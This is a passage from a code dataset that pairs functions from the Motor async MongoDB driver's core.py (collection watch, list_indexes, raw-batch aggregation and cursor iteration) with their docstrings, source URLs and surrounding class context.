change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.aggregate_raw_batches | python | def aggregate_raw_batches(self, pipeline, **kwargs):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs)) | Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0 | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L664-L690 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.list_indexes | python | def list_indexes(self, session=None):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session) | Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')]) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L818-L833 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor._get_more | python | def _get_more(self):
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh() | Initial query or getMore. Returns a Future. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L900-L908 | null | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
